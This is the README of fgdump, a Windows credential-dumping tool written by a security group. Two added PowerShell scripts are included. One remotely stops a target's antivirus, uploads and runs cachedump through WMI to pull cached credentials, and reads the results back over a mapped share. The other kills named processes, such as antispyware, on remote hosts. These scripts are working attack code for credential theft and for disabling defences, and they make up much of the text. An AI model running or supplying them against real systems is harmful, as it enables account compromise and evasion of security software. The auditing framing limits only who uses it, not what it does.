** fgdump - A utility for dumping passwords on Windows NT/2000/XP/2003 machines **
Written by fizzgig (fizzgig@foofus.net)

Greets to all my fellow Foofites: j0m0-Kun (who is the inspiration for this program), 
phenfen, omi, fade, pmonkey, grunch and of course our namesake foofus.

Many thanks to the awesome folks who created cachedump and pwdump3e as well! 

More information: http://www.foofus.net

Please let me know if this is useful to you, and I welcome (constructive) comments and
suggestions at fizzgig@foofus.net.

fgdump was born out of frustration with antivirus (AV) products that only partially
handled execution of programs like pwdump. Certain vendors' products would sometimes
allow pwdump to run, sometimes not, and sometimes lock up the box. As such, we as
security engineers had to remember to shut off antivirus before running pwdump and
similar utilities like cachedump. Needless to say, we're forgetful sometimes...

So fgdump started as simply a wrapper around things we had to do to make pwdump work 
effectively. Later, cachedump was added to the mix, as were a couple other variations
of AV. Over time it has grown, and continues to grow, to support our assessments and
other projects. We are beginning to use it extensively within Windows domains for
broad password auditing, and in conjunction with other tools (ownr and pwdumpToMatrix.pl)
for discovering implied trust relationships.

fgdump is targeted at the security auditing community, and is designed to be used for 
good, not evil. :) Note that, in order to use fgdump effectively, you're going to need 
high-power credentials (Administrator or Domain Administrator, in most cases), thus
limiting its usefulness as a hacking tool. However, hopefully some of you other security
folks will find this helpful.

In quick summary, the main code execution path of fgdump is as follows:

1) Bind to a remote machine using IPC$ (or a list of machines)
2) Stop AV, if it is installed
3) Locate file shares exposed on that machine
4) Find a writable share from the above list, bind it to a local drive
5) Upload fgexec (used for remote command execution), cachedump
6) Run pwdump
7) Run cachedump
8) Delete uploaded files from the file share
9) Unbind the remote file share
10) Restart AV if it was running
11) Unbind from IPC$
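
The execution path above, as an added PowerShell example written for this README (it is
not fgdump's own code). It makes two substitutions: remote execution goes through WMI
(Win32_Process.Create over DCOM, which needs the same Administrator credentials) instead
of the fgexec service, and the share list comes from WMI Win32_Share, which also reports
each share's path on the target's disk so the uploaded tool can be started there. It
uploads and runs one tool that writes its results to stdout (cachedump does), reads the
redirected output back over the mapped drive, and does the cleanup steps in a finally
block so AV is restarted and files are removed even when a step fails. The host name,
AV service name, tool path and drive letter are placeholders, not values from the README.

```powershell
# Added example, not fgdump's own code. Assumptions: WMI/DCOM reachable on the
# target, an Administrator-level credential, and placeholder names below.
param(
    [string]$Target    = 'TARGET-PC',        # hypothetical host
    [string]$AvService = 'AvEngineSvc',      # hypothetical AV service name
    [string]$Tool      = '.\cachedump.exe',  # local copy of the tool to run remotely
    [string]$Drive     = 'Z:'                # free local drive letter to bind the share to
)

$Cred = Get-Credential                       # Administrator / Domain Administrator
$Net  = $Cred.GetNetworkCredential()
$avWasRunning = $false
$mapped       = $false
$uploaded     = @()

try {
    # 1) Bind to IPC$ (the password is visible in the local process list)
    & net use "\\$Target\IPC$" $Net.Password "/user:$($Cred.UserName)" | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "IPC`$ bind to $Target failed" }

    # 2) Stop AV if it is installed and running (remember to restart it later)
    $av = Get-WmiObject -Class Win32_Service -ComputerName $Target -Credential $Cred `
                        -Filter "Name='$AvService'"
    if ($av -and $av.State -eq 'Running') {
        $avWasRunning = $true
        $null = $av.StopService()
    }

    # 3) Locate disk shares. Type 0 = disk share, 0x80000000 = admin disk share;
    #    Win32_Share.Path is the directory on the target's own disk.
    $shares = Get-WmiObject -Class Win32_Share -ComputerName $Target -Credential $Cred |
              Where-Object { ($_.Type -eq 0 -or $_.Type -eq 2147483648) -and $_.Path }

    # 4) Find a writable share and bind it to the local drive letter
    $share = $null
    foreach ($s in $shares) {
        & net use $Drive "\\$Target\$($s.Name)" | Out-Null
        if ($LASTEXITCODE -ne 0) { continue }
        try {
            Set-Content -Path "$Drive\fg_probe.tmp" -Value 'x' -ErrorAction Stop
            Remove-Item "$Drive\fg_probe.tmp" -ErrorAction SilentlyContinue
            $share = $s; $mapped = $true; break
        } catch {
            & net use $Drive /delete /y | Out-Null   # read-only: unbind and try the next
        }
    }
    if (-not $share) { throw "No writable share found on $Target" }

    # 5) Upload the tool; remember every path we create for cleanup
    $toolName = Split-Path $Tool -Leaf
    $outName  = 'fg_out.txt'
    Copy-Item $Tool "$Drive\$toolName"
    $uploaded += "$Drive\$toolName", "$Drive\$outName"

    # 6/7) Run the tool on the target (WMI instead of fgexec), stdout into the share
    $base      = $share.Path.TrimEnd('\')
    $remoteCmd = "cmd.exe /c `"`"$base\$toolName`" > `"$base\$outName`"`""
    $r = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $remoteCmd `
                          -ComputerName $Target -Credential $Cred
    if ($r.ReturnValue -ne 0) { throw "Win32_Process.Create returned $($r.ReturnValue)" }

    # Wait (bounded) until the remote process is gone, then read the output back
    $deadline = (Get-Date).AddSeconds(60)
    while ((Get-Date) -lt $deadline -and
           (Get-WmiObject -Class Win32_Process -ComputerName $Target -Credential $Cred `
                          -Filter "ProcessId = $($r.ProcessId)")) {
        Start-Sleep -Seconds 1
    }
    Get-Content "$Drive\$outName"
}
finally {
    # 8) Delete uploaded files   9) Unbind the share
    if ($mapped) {
        $uploaded | ForEach-Object { Remove-Item $_ -ErrorAction SilentlyContinue }
        & net use $Drive /delete /y | Out-Null
    }
    # 10) Restart AV only if we were the ones who stopped it
    if ($avWasRunning) { $null = $av.StartService() }
    # 11) Unbind IPC$
    & net use "\\$Target\IPC$" /delete /y | Out-Null
}
```

Two things worth keeping in mind with either this script or fgdump itself: stopping and
restarting a service, and installing one (fgexec, or pwdump's own service), are recorded
by the Service Control Manager in the target's System event log, so the whole sequence is
visible to anyone who reviews those logs; and the finally block only covers failures the
script sees, so if the target reboots mid-run (see KNOWN ISSUES below) the uploaded files
may be left on the share and should be removed by hand.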

Many of the parameters associated with these operations are tweakable via the command line.
Run fgdump with no parameters to get the current list of available parameters.

fgdump embeds several programs within its resource tree. This means you only need a single 
executable rather than dragging around a bunch of them. The important ones are:

- cachedump: This is the popular cached credential program created by the folks at
off-by-one.net (http://www.off-by-one.net/misc/cachedump.html). Currently, the executable 
is included verbatim.
- pwdump3fg: A modified version of pwdump3e. It was tweaked to use other shares besides
just ADMIN$, but otherwise should function in exactly the same way as pwdump3e.

The source for both of these programs is included in the fgdump source tree, as mandated by
the GPL. If you modify fgdump and still use these programs, please continue to distribute
the source code for these fine programs.

Also in the source tree:
- fgexec: A simple service that can be installed remotely and will run an executable on the
target. It's very similar in function to psservice or sc, just more limited.

KNOWN ISSUES:

- There appears to be a very bizarre interaction when a target is running M$ "Anti"spyware.
A user will be notified of the installation of the fgexec service, but it appears to run 
anyway despite a user denying the action. In some cases, this operation ends up crashing 
LSASS.EXE, which will auto-reboot the target. The moral of the story: be careful using this
against machines with M$'s Antispyware.

- We've seen isolated incidents of LSASS.EXE crashing even without M$AS, but they are
few and far between. We haven't yet nailed down a cause, but the bet right now is on
LSAEXT.DLL (part of pwdump) causing a problem, which causes its host (LSASS.EXE) to
crash. So again, be careful.

If anyone has additional feedback on these issues, let me know. Also, if you have suggestions
on terminating a program on a remote machine that DOESN'T INVOLVE INSTALLING A NEW SERVICE
(like fgexec or psexec do), let me know. If I can do that, I have a M$AS terminator, but
right now I can't execute it, so I have not yet included it with fgdump. This is a work in 
progress, and the subject of furious research. :)
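
One way to terminate a program on a remote machine without installing a service is WMI:
Win32_Process.Terminate runs over DCOM/RPC with Administrator credentials and touches no
service on the target. The function below is an added example written for this README,
not fgdump's own code or the M$AS terminator it mentions; the target host and process
name are placeholders, and it assumes DCOM (TCP 135 plus the dynamic RPC ports) is
reachable, which is not the case everywhere SMB is.

```powershell
# Added example, not part of fgdump: kill every process with a given image name on
# a remote host through WMI, with no service installed on the target.
function Stop-RemoteProcess {
    param(
        [Parameter(Mandatory = $true)][string]$Target,        # hypothetical host
        [Parameter(Mandatory = $true)][string]$ProcessName,   # e.g. 'someagent.exe' (placeholder)
        [Parameter(Mandatory = $true)]
        [System.Management.Automation.PSCredential]$Credential
    )
    $procs = Get-WmiObject -Class Win32_Process -ComputerName $Target `
                           -Credential $Credential -Filter "Name='$ProcessName'"
    foreach ($p in @($procs)) {
        # Terminate() returns a WMI result object; ReturnValue 0 = success,
        # 2 = access denied, 3 = insufficient privilege
        $rc = $p.Terminate().ReturnValue
        New-Object PSObject -Property @{
            ProcessId   = $p.ProcessId
            Name        = $p.Name
            ReturnValue = $rc
        }
    }
}

# Usage (placeholders): prompts for an Administrator credential, then lists what was hit
Stop-RemoteProcess -Target 'TARGET-PC' -ProcessName 'someagent.exe' -Credential (Get-Credential)
```

Note that this only ends the process; if the program is itself hosted by a service with
automatic restart, the service control manager will simply start it again, so check the
Win32_Service entries on the target before relying on a kill alone.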

COMPILING:

The code was all compiled using Visual Studio .NET 2003, and solution/project files for 
it have been included. Ideally, everything should compile out of the box. :)

DISCLAIMER:

Neither I nor foofus.net can take any responsibility for misuse of this program, nor can I
guarantee that it will not have adverse effects on certain hosts. By using this program,
you assume any and all risk associated with the execution of the program, including 
but not limited to damage to a system or data loss. In other words, if you break 
someone's stuff, don't come crying to me. :)

--fizzgig
